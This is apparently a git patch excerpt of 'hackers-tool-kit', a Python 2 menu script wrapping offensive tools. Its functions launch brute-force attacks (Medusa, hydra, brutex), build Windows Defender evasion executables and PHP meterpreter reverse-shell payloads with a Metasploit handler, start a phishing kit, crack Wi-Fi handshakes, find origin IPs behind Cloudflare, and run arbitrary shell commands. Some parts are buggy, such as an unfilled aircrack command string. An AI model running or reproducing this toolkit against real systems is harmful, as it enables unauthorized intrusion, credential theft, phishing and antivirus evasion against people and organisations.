hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From e584b8546ed9d43e6f7d9b4454d1e3fb2a8640aa Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 02:40:22 +0100 Subject: [PATCH 140/214] Add files via upload --- htk.py | 2833 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2833 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..1848a4d --- /dev/null +++ b/htk.py @@ -0,0 +1,2833 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ 